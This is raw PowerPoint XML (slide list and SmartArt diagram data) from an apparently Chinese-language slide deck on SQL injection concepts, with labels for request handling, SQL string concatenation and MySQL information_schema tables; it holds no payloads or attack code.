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412" r:id="rId3"/>
    <p:sldId id="413" r:id="rId4"/>
    <p:sldId id="431" r:id="rId5"/>
    <p:sldId id="430" r:id="rId6"/>
    <p:sldId id="432" r:id="rId7"/>
    <p:sldId id="433" r:id="rId8"/>
    <p:sldId id="477" r:id="rId9"/>
    <p:sldId id="478" r:id="rId10"/>
    <p:sldId id="476" r:id="rId11"/>
    <p:sldId id="482" r:id="rId12"/>
    <p:sldId id="479" r:id="rId13"/>
    <p:sldId id="480" r:id="rId14"/>
    <p:sldId id="483" r:id="rId15"/>
    <p:sldId id="481" r:id="rId16"/>
    <p:sldId id="484" r:id="rId17"/>
    <p:sldId id="438" r:id="rId18"/>
    <p:sldId id="435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66" r:id="rId28"/>
    <p:sldId id="447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9" r:id="rId47"/>
    <p:sldId id="467" r:id="rId48"/>
    <p:sldId id="468" r:id="rId49"/>
    <p:sldId id="470" r:id="rId50"/>
    <p:sldId id="471" r:id="rId51"/>
    <p:sldId id="473" r:id="rId52"/>
    <p:sldId id="475" r:id="rId53"/>
    <p:sldId id="472" r:id="rId54"/>
    <p:sldId id="474" r:id="rId5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0" autoAdjust="0"/>
    <p:restoredTop sz="93633" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="81" d="100"/>
          <a:sy n="81" d="100"/>
        </p:scale>
        <p:origin x="60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D111E-69BF-4BA6-80F2-99AE6EBD57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BFC07A-CEE6-46B7-9CE5-63E9FD9C665C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9A594DB2-8872-4854-8CBF-002B4AE223B4}" type="parTrans" cxnId="{882C46C3-BFF2-49DF-AB96-002891E560F5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E70703AA-CF76-46FC-82D4-0A0BD8011E67}" type="sibTrans" cxnId="{882C46C3-BFF2-49DF-AB96-002891E560F5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F0A6EDCE-E53D-4EAD-8E8F-55116FFEB387}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            <a:t>服务器接收请求</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A939E53D-EA4A-4976-8535-DAD23D4902C4}" type="parTrans" cxnId="{9E3005B1-4664-4C28-BDC4-64E28D136997}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{134C0568-984B-46AA-A16B-8B0744407308}" type="sibTrans" cxnId="{9E3005B1-4664-4C28-BDC4-64E28D136997}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0E7A75C4-64F3-49E8-8884-C53006FAF346}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            <a:t>拼接</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            <a:t>SQL</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            <a:t>语句</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{376075E0-8DF5-4DDC-9E31-77DF2F498281}" type="parTrans" cxnId="{1BD11F7C-EB87-4CA6-8F57-C793757A429E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{061260F6-5682-4FB4-9457-D55AD9A459EB}" type="sibTrans" cxnId="{1BD11F7C-EB87-4CA6-8F57-C793757A429E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{24B412C1-21B2-4F6A-89B2-42E1AB2B60EB}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            <a:t>数据库查询</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FC64D69E-795B-4276-B2D7-6C96349F216C}" type="parTrans" cxnId="{CE171918-9AC7-4825-BD94-5C5DED03B8C8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AB2271AE-D3C2-439E-A9C6-7B1F96136B4E}" type="sibTrans" cxnId="{CE171918-9AC7-4825-BD94-5C5DED03B8C8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AD48DF92-1FDF-47AB-BF35-D16598316AEB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F324F636-899C-4D23-BC15-0AE59DA37585}" type="parTrans" cxnId="{DA923F0A-267E-460A-9E23-08088DB6B6D0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C8542300-35A6-44E1-9444-1F562DBE454E}" type="sibTrans" cxnId="{DA923F0A-267E-460A-9E23-08088DB6B6D0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EDA936D2-7B17-4E55-B56F-EADA0C599BB2}" type="pres">
      <dgm:prSet presAssocID="{E27D111E-69BF-4BA6-80F2-99AE6EBD57CE}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A8A3118E-FD59-4C6C-8208-4B19406086A4}" type="pres">
      <dgm:prSet presAssocID="{31BFC07A-CEE6-46B7-9CE5-63E9FD9C665C}" presName="node" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{87AC88B6-8A25-4CDB-A5B1-4A5597E4AC9A}" type="pres">
      <dgm:prSet presAssocID="{E70703AA-CF76-46FC-82D4-0A0BD8011E67}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6D1AD8D8-C1EC-452D-B149-246A0DB4F6D8}" type="pres">
      <dgm:prSet presAssocID="{E70703AA-CF76-46FC-82D4-0A0BD8011E67}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FF02C4F4-61B5-4763-8F0E-3C3B83298318}" type="pres">
      <dgm:prSet presAssocID="{F0A6EDCE-E53D-4EAD-8E8F-55116FFEB387}" presName="node" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0E59D071-3D1F-4775-B261-DED7DD0E3995}" type="pres">
      <dgm:prSet presAssocID="{134C0568-984B-46AA-A16B-8B0744407308}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{669D5DD7-A4B8-42DB-B24A-BC13A1CAC24A}" type="pres">
      <dgm:prSet presAssocID="{134C0568-984B-46AA-A16B-8B0744407308}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3B454A85-3FC5-46BA-AAD6-733C1FDF4A21}" type="pres">
      <dgm:prSet presAssocID="{0E7A75C4-64F3-49E8-8884-C53006FAF346}" presName="node" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4455981C-5A36-4755-8675-D715979889BB}" type="pres">
      <dgm:prSet presAssocID="{061260F6-5682-4FB4-9457-D55AD9A459EB}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="2" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EDC345B9-B071-4A27-AAFD-CC9520551515}" type="pres">
      <dgm:prSet presAssocID="{061260F6-5682-4FB4-9457-D55AD9A459EB}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="2" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BCF3412A-AB92-49B6-8A3A-4EC5AC6BFDDC}" type="pres">
      <dgm:prSet presAssocID="{24B412C1-21B2-4F6A-89B2-42E1AB2B60EB}" presName="node" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3F78D5EE-54EA-46DD-BC8E-F6988730E29C}" type="pres">
      <dgm:prSet presAssocID="{AB2271AE-D3C2-439E-A9C6-7B1F96136B4E}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="3" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{88D33453-FC65-4AA1-BA6F-E9C609D53107}" type="pres">
      <dgm:prSet presAssocID="{AB2271AE-D3C2-439E-A9C6-7B1F96136B4E}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="3" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{42DA8F42-25C0-4654-B3B6-F4044BAF7032}" type="pres">
      <dgm:prSet presAssocID="{AD48DF92-1FDF-47AB-BF35-D16598316AEB}" presName="node" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{7EC09105-358F-401A-BA41-F934879A04B6}" type="presOf" srcId="{E27D111E-69BF-4BA6-80F2-99AE6EBD57CE}" destId="{EDA936D2-7B17-4E55-B56F-EADA0C599BB2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{DA923F0A-267E-460A-9E23-08088DB6B6D0}" srcId="{E27D111E-69BF-4BA6-80F2-99AE6EBD57CE}" destId="{AD48DF92-1FDF-47AB-BF35-D16598316AEB}" srcOrd="4" destOrd="0" parTransId="{F324F636-899C-4D23-BC15-0AE59DA37585}" sibTransId="{C8542300-35A6-44E1-9444-1F562DBE454E}"/>
    <dgm:cxn modelId="{A01D0717-085C-4943-8CB4-6D1515796C4B}" type="presOf" srcId="{0E7A75C4-64F3-49E8-8884-C53006FAF346}" destId="{3B454A85-3FC5-46BA-AAD6-733C1FDF4A21}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{CE171918-9AC7-4825-BD94-5C5DED03B8C8}" srcId="{E27D111E-69BF-4BA6-80F2-99AE6EBD57CE}" destId="{24B412C1-21B2-4F6A-89B2-42E1AB2B60EB}" srcOrd="3" destOrd="0" parTransId="{FC64D69E-795B-4276-B2D7-6C96349F216C}" sibTransId="{AB2271AE-D3C2-439E-A9C6-7B1F96136B4E}"/>
    <dgm:cxn modelId="{402AD21B-068C-41FB-A2A9-1972F668467D}" type="presOf" srcId="{24B412C1-21B2-4F6A-89B2-42E1AB2B60EB}" destId="{BCF3412A-AB92-49B6-8A3A-4EC5AC6BFDDC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{97C3D23D-28B4-4B5C-90BF-CF99150C92DF}" type="presOf" srcId="{E70703AA-CF76-46FC-82D4-0A0BD8011E67}" destId="{6D1AD8D8-C1EC-452D-B149-246A0DB4F6D8}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{5BA87F6C-4803-4E57-934F-78039482FDBD}" type="presOf" srcId="{061260F6-5682-4FB4-9457-D55AD9A459EB}" destId="{EDC345B9-B071-4A27-AAFD-CC9520551515}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{FBFDB04F-42AE-4887-B30A-F5A7B503CA1C}" type="presOf" srcId="{061260F6-5682-4FB4-9457-D55AD9A459EB}" destId="{4455981C-5A36-4755-8675-D715979889BB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{A335D275-C5E5-473F-AF57-45FA835069BA}" type="presOf" srcId="{E70703AA-CF76-46FC-82D4-0A0BD8011E67}" destId="{87AC88B6-8A25-4CDB-A5B1-4A5597E4AC9A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{6E5DBB77-D593-4D26-AD3C-A57064853F56}" type="presOf" srcId="{134C0568-984B-46AA-A16B-8B0744407308}" destId="{669D5DD7-A4B8-42DB-B24A-BC13A1CAC24A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{1BD11F7C-EB87-4CA6-8F57-C793757A429E}" srcId="{E27D111E-69BF-4BA6-80F2-99AE6EBD57CE}" destId="{0E7A75C4-64F3-49E8-8884-C53006FAF346}" srcOrd="2" destOrd="0" parTransId="{376075E0-8DF5-4DDC-9E31-77DF2F498281}" sibTransId="{061260F6-5682-4FB4-9457-D55AD9A459EB}"/>
    <dgm:cxn modelId="{DF7B8595-512D-409E-914D-0B96838875DC}" type="presOf" srcId="{AB2271AE-D3C2-439E-A9C6-7B1F96136B4E}" destId="{88D33453-FC65-4AA1-BA6F-E9C609D53107}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{9E3005B1-4664-4C28-BDC4-64E28D136997}" srcId="{E27D111E-69BF-4BA6-80F2-99AE6EBD57CE}" destId="{F0A6EDCE-E53D-4EAD-8E8F-55116FFEB387}" srcOrd="1" destOrd="0" parTransId="{A939E53D-EA4A-4976-8535-DAD23D4902C4}" sibTransId="{134C0568-984B-46AA-A16B-8B0744407308}"/>
    <dgm:cxn modelId="{420B6CB3-4786-4E51-BB1A-0636CD7ABA54}" type="presOf" srcId="{31BFC07A-CEE6-46B7-9CE5-63E9FD9C665C}" destId="{A8A3118E-FD59-4C6C-8208-4B19406086A4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{793858C2-6698-450E-B74B-77CA4040C937}" type="presOf" srcId="{AB2271AE-D3C2-439E-A9C6-7B1F96136B4E}" destId="{3F78D5EE-54EA-46DD-BC8E-F6988730E29C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{882C46C3-BFF2-49DF-AB96-002891E560F5}" srcId="{E27D111E-69BF-4BA6-80F2-99AE6EBD57CE}" destId="{31BFC07A-CEE6-46B7-9CE5-63E9FD9C665C}" srcOrd="0" destOrd="0" parTransId="{9A594DB2-8872-4854-8CBF-002B4AE223B4}" sibTransId="{E70703AA-CF76-46FC-82D4-0A0BD8011E67}"/>
    <dgm:cxn modelId="{D667E8CD-DA1E-40E5-BDA7-F6481B995F16}" type="presOf" srcId="{AD48DF92-1FDF-47AB-BF35-D16598316AEB}" destId="{42DA8F42-25C0-4654-B3B6-F4044BAF7032}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{DC22A5D1-B7A9-404E-8F83-87154F18BC9E}" type="presOf" srcId="{134C0568-984B-46AA-A16B-8B0744407308}" destId="{0E59D071-3D1F-4775-B261-DED7DD0E3995}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{F08653DA-EED7-4B47-9FC3-74593602F64A}" type="presOf" srcId="{F0A6EDCE-E53D-4EAD-8E8F-55116FFEB387}" destId="{FF02C4F4-61B5-4763-8F0E-3C3B83298318}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{8E3A3852-6AC3-4292-896C-326537E1A47E}" type="presParOf" srcId="{EDA936D2-7B17-4E55-B56F-EADA0C599BB2}" destId="{A8A3118E-FD59-4C6C-8208-4B19406086A4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{1DAE21BF-2576-44F7-AD28-0792AE258772}" type="presParOf" srcId="{EDA936D2-7B17-4E55-B56F-EADA0C599BB2}" destId="{87AC88B6-8A25-4CDB-A5B1-4A5597E4AC9A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{88220965-D354-4BF0-98B6-1CA06DC9A1CA}" type="presParOf" srcId="{87AC88B6-8A25-4CDB-A5B1-4A5597E4AC9A}" destId="{6D1AD8D8-C1EC-452D-B149-246A0DB4F6D8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{47B7D142-809A-47A5-93BD-0F8B2AAF98E0}" type="presParOf" srcId="{EDA936D2-7B17-4E55-B56F-EADA0C599BB2}" destId="{FF02C4F4-61B5-4763-8F0E-3C3B83298318}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{54A990D7-F3DC-4510-909C-692A5467C8EA}" type="presParOf" srcId="{EDA936D2-7B17-4E55-B56F-EADA0C599BB2}" destId="{0E59D071-3D1F-4775-B261-DED7DD0E3995}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{F8EBB8A5-89B1-4D58-8A33-4E8077E8FC40}" type="presParOf" srcId="{0E59D071-3D1F-4775-B261-DED7DD0E3995}" destId="{669D5DD7-A4B8-42DB-B24A-BC13A1CAC24A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{F0DA19F5-775F-4393-B59D-1EB09F522EF9}" type="presParOf" srcId="{EDA936D2-7B17-4E55-B56F-EADA0C599BB2}" destId="{3B454A85-3FC5-46BA-AAD6-733C1FDF4A21}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{504C5C21-0D5F-487D-A095-5D1F85B80652}" type="presParOf" srcId="{EDA936D2-7B17-4E55-B56F-EADA0C599BB2}" destId="{4455981C-5A36-4755-8675-D715979889BB}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{60B189F1-DF01-43D6-AA54-EA516BA69268}" type="presParOf" srcId="{4455981C-5A36-4755-8675-D715979889BB}" destId="{EDC345B9-B071-4A27-AAFD-CC9520551515}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{17EF582D-C571-4490-B1F2-2CD7349B300E}" type="presParOf" srcId="{EDA936D2-7B17-4E55-B56F-EADA0C599BB2}" destId="{BCF3412A-AB92-49B6-8A3A-4EC5AC6BFDDC}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{A3DD6A40-3A31-431E-A64A-1B41B402DE30}" type="presParOf" srcId="{EDA936D2-7B17-4E55-B56F-EADA0C599BB2}" destId="{3F78D5EE-54EA-46DD-BC8E-F6988730E29C}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{853C13F3-51E0-4DE5-954A-5500AD98B6B7}" type="presParOf" srcId="{3F78D5EE-54EA-46DD-BC8E-F6988730E29C}" destId="{88D33453-FC65-4AA1-BA6F-E9C609D53107}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{673BD6B8-9A71-4094-9E89-FECF4AC756DD}" type="presParOf" srcId="{EDA936D2-7B17-4E55-B56F-EADA0C599BB2}" destId="{42DA8F42-25C0-4654-B3B6-F4044BAF703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491C8-D125-4D73-8B66-51B8EF9B94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3089D0-658F-46EA-BD37-933545119994}">
      <dgm:prSet phldrT="[文本]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
            <a:t>默认表</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{82E2AE2E-29CC-42A1-9E66-88E3F3D14858}" type="parTrans" cxnId="{9267C629-C860-4141-B7FD-162102F0C540}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{70789FDE-CB91-443D-956B-C7376F9ABA78}" type="sibTrans" cxnId="{9267C629-C860-4141-B7FD-162102F0C540}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BB88B010-70A6-4849-BAA0-923BEBA44D94}">
      <dgm:prSet phldrT="[文本]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
            <a:t>Information_</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
            <a:t>schema</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B39327E8-8966-4266-AF32-04F80DC9F625}" type="parTrans" cxnId="{03D9F570-1C98-4B93-8E79-5B3772849776}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{22E92F78-2516-47C7-820B-AD0F23AB0D22}" type="sibTrans" cxnId="{03D9F570-1C98-4B93-8E79-5B3772849776}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{82133096-784D-46CA-9F4C-A98A454C5C98}">
      <dgm:prSet phldrT="[文本]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
            <a:t>Informmation_schema.tables</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7ED19606-EDEE-4BFB-9B2A-4EBB244646F0}" type="parTrans" cxnId="{E01C86B3-2C21-4634-8840-95F07D61C742}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CD39DCA7-7F8C-4E34-8E54-AEB08378E4C7}" type="sibTrans" cxnId="{E01C86B3-2C21-4634-8840-95F07D61C742}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0FACC8EC-DAB0-4965-8EB3-926C53C4A5A2}">
      <dgm:prSet phldrT="[文本]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
            <a:t>Information_scheme.columns</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{86DADEC9-AEA7-47A7-A73E-7B12A4CBDD28}" type="parTrans" cxnId="{53995B60-A510-4F6B-94AC-CA039B97DCA5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{95E54326-0DB8-45CB-B76A-C9B65E75F706}" type="sibTrans" cxnId="{53995B60-A510-4F6B-94AC-CA039B97DCA5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0A4AC319-2C55-44C8-9A8B-48420734DD3C}">
      <dgm:prSet phldrT="[文本]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
            <a:t>USER</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{81FADDCE-2246-4BF1-BF04-81AD84626EE9}" type="parTrans" cxnId="{0A34A8E0-EA16-448A-B709-F9F5DE02D97E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B4BA8921-5C6D-4DD3-A2CD-B00473D43B82}" type="sibTrans" cxnId="{0A34A8E0-EA16-448A-B709-F9F5DE02D97E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{38E454BF-1DBD-45FC-9964-693322103C0A}">
